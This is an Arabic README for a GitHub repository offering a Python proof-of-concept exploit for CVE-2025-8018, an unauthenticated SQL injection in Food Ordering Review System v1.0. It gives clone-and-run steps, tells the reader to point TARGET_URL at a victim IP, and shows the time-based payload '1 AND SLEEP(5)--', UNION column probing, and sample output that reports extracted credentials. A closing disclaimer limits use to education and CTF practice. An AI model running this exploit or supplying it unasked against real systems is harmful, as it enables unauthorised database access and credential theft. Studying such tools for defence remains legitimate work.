
استغلال PoC بايثون لـ CVE-2025-8018، ثغرة حقن SQL حرجة بدون مصادقة في Food Ordering Review System v1.0. يدعم استخراج البيانات الأعمى القائم على الوقت والقائم على UNION للاختراق الأخلاقي وتدريب CTF.
يوفر هذا المستودع استغلالًا مكتوبًا بلغة Python لإثبات المفهوم (PoC) لـ CVE-2025-8018، وهي ثغرة حقن SQL شديدة الخطورة اكتُشفت في نظام مراجعة طلبات الطعام v1.0. تحدث الثغرة عبر المعامل reg_Id في reservation_page.php.
/user/reservation_page.phpreg_Idusers، دون مصادقةSLEEP()UNION SELECT NULL,NULL,...requestsثبّت التبعيات:
pip install requests
كيفية الاستخدام استنسخ المستودع:
git clone https://github.com/drackyjr/CVE-2025-8018.git
cd CVE-2025-8018
حدّث عنوان الهدف (URL):
افتح cve-2025-8018.py وعدّل:
TARGET_URL = "http://TARGET-IP/user/reservation_page.php" استبدل TARGET-IP بالعنوان الفعلي للنظام المستضعَف.
شغّل سكربت الاستغلال:
python3 cve-2025-8018.py
المخرجات
[*] Checking time-based SQLi with payload: 1 AND SLEEP(5)--
[+] Blind SQL injection confirmed!
[*] Testing how many columns the query expects...
[+] Looks like 3 columns work!
[*] Trying to extract data using UNION-based SQL injection...
[+] Found potential credentials in the response!
[*] Trying blind extraction fallback...
[+] Username is 7 characters long!
⚠️ إخلاء المسؤولية يُقدَّم إثبات المفهوم هذا لأغراض تعليمية فقط، مثل تحديات CTF، أو التدريب على الأمن السيبراني، أو اختبار الدفاعات على أنظمتك الخاصة.
لا تستخدم هذا ضد أي أنظمة إنتاج أو أنظمة ليس لديك إذن صريح لاختبارها. المؤلف وأي جهات مرتبطة غير مسؤولين عن سوء الاستخدام أو الأضرار الناتجة عن الكود.